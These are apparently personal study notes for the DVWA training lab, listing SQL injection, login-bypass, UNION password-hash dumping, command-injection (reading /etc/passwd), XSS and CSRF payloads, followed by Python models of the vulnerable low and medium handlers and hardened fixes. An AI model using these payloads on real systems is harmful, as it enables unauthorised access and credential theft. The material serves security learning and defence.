SQL injection
---on DVWA these seem backwards...

Scope out the DB with a simple injection: ' --- does it throw an error?

---low: ' or 1=1 -- ;----- don't forget the trailing space after the -- in MySQL
---medium: 1 or 1=1 -- ;----- trailing space again. The medium form takes a numeric id and escapes quotes, so the payload needs no quote to break out of anything. It did take me a while to figure this out because I didn't put myself in the shoes of a bad developer. It didn't occur to me.

Login bypass
admin' and 1=1 -- ;----- trailing space; the comment throws away the rest of the WHERE clause, password check included

Data exfiltration
---low: 1' UNION ALL SELECT user, password FROM users -- 
---medium: 1 UNION ALL SELECT user, password FROM users -- 
Both return the hashed passwords (the UNION has to select the same number of columns as the original query).

Command execution
Scope it out and see what it does. The output looks very familiar (just like the ping utility), so it must be calling ping via PHP system() and passing whatever I type in the box to it. Could you string multiple commands together? Yes, most shells allow && or ;.
---low: 127.0.0.1&& cat /etc/passwd
---medium: 127.0.0.1|cat /etc/passwd ;----- the medium filter strips && and ; but leaves | alone
192.168.1.1| echo \<script\>alert\(\"test\"\)\<\/script\> --example of XSS through the same hole

XSS
Use this to append to the end of a document (reflected), or inject it into a database that is queried for content to display (stored).

CSRF
http://t3100/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&user=1337&Change=Change#
The password change is a plain GET with no anti-CSRF token in it, so any page that gets a logged-in victim's browser to load this URL performs the change.
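Why the low payload needs the quote and the medium payload must not have one, as an added example that is not DVWA's code: the table, rows and hashes are constructed, SQLite stands in for MySQL, and escape_quotes is a stand-in for mysql_real_escape_string (it is only applied in the unquoted medium context, where its behaviour matches MySQL's for this purpose).

```python
import sqlite3

# Constructed stand-in for DVWA's users table (sample rows, not DVWA's real data).
SAMPLE_USERS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "e99a18c428cb38d5f260853678922e03"),
    (3, "1337", "8d3533d75ae2c3966d7e0d4fcc69216b"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return db


def escape_quotes(value):
    # Stand-in for mysql_real_escape_string: backslash-escape quotes and backslashes.
    # It only neutralises a quote that would otherwise close a string literal; in an
    # unquoted numeric comparison (medium) it changes nothing the attacker needs.
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def low_query(user_id):
    # Low: raw input inside a quoted literal, so a single quote breaks out of it.
    return f"SELECT user, password FROM users WHERE user_id = '{user_id}'"


def medium_query(user_id):
    # Medium: input is escaped, but the numeric column is compared without quotes,
    # so "1 or 1=1 -- " contains no quote and passes the escaping untouched.
    return f"SELECT user, password FROM users WHERE user_id = {escape_quotes(user_id)}"


def run(sql):
    """Execute an attacker-shaped query; returns the rows, or None on a SQL error."""
    db = make_db()
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    finally:
        db.close()


def safe_lookup(user_id):
    """Hardened version: enforce the integer type, then bind the value as a parameter."""
    if not user_id.isdigit():
        return []  # reject rather than coerce; "1 or 1=1 -- " never reaches the DB
    db = make_db()
    try:
        return db.execute(
            "SELECT user, password FROM users WHERE user_id = ?", (int(user_id),)
        ).fetchall()
    finally:
        db.close()


if __name__ == "__main__":
    payloads = (
        "' or 1=1 -- ",
        "1 or 1=1 -- ",
        "1' UNION ALL SELECT user, password FROM users -- ",
        "1 UNION ALL SELECT user, password FROM users -- ",
    )
    for build in (low_query, medium_query):
        for payload in payloads:
            print(f"{build.__name__:13} {payload!r:55} -> {run(build(payload))}")
    print("safe_lookup('1 or 1=1 -- ') ->", safe_lookup("1 or 1=1 -- "))
```

The quoted payloads dump every row under low_query and produce a syntax error under medium_query; the unquoted payloads return nothing under low (they are just a non-numeric string) and dump every row under medium. Only safe_lookup survives all four.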
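The command-execution low/medium difference, as an added example that is not DVWA's code: low_command and medium_command model the ping handler (the medium blacklist of && and ; is assumed from DVWA's behaviour described above), commands_run_by_shell is a constructed minimal parser that lists which commands a POSIX shell would actually start, and hardened_argv is the fix a practitioner would apply.

```python
import ipaddress
import shlex
import subprocess

# Assumed operator sets for the toy parser: after these, the shell starts a new command...
NEXT_IS_COMMAND = {"|", "||", "&", "&&", ";", "("}
# ...and after these the next word is a filename or nothing, not a command.
NEXT_IS_NOT_COMMAND = {"<", ">", ">>", "<<", ")"}


def low_command(target):
    # Low: no filtering; the string goes straight to a shell, as the notes guess
    # DVWA does from PHP.
    return f"ping -c 4 {target}"


def medium_command(target):
    # Medium (modelled on DVWA's blacklist): "&&" and ";" are stripped, but "|",
    # "||" and "&" are not, so a pipe still reaches the shell intact.
    for bad in ("&&", ";"):
        target = target.replace(bad, "")
    return f"ping -c 4 {target}"


def commands_run_by_shell(cmdline):
    """Return the command words a POSIX shell would execute for cmdline, in order.

    shlex with punctuation_chars groups runs of ();<>|& into operator tokens;
    the first word, and any word following a command separator, is a command.
    """
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, expect_command = [], True
    for tok in lexer:
        if tok in NEXT_IS_COMMAND:
            expect_command = True
        elif tok in NEXT_IS_NOT_COMMAND:
            expect_command = False
        elif expect_command:
            commands.append(tok)
            expect_command = False
    return commands


def hardened_argv(target):
    """Hardened: accept only a literal IP address; returns argv, or None if rejected."""
    try:
        ip = ipaddress.ip_address(target.strip())
    except ValueError:
        return None
    return ["ping", "-c", "4", str(ip)]


def run_ping(target):
    """Run the validated argv without a shell, so metacharacters have no meaning."""
    argv = hardened_argv(target)
    if argv is None:
        raise ValueError(f"rejected target: {target!r}")
    return subprocess.run(argv, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    for payload in ("127.0.0.1&& cat /etc/passwd", "127.0.0.1|cat /etc/passwd"):
        print("low   :", commands_run_by_shell(low_command(payload)))
        print("medium:", commands_run_by_shell(medium_command(payload)))
        print("hard  :", hardened_argv(payload))
```

With the && payload, low starts both ping and cat while medium starts only ping; with the | payload both levels start cat. hardened_argv rejects both because neither string is an IP address, and run_ping never hands anything to a shell in the first place.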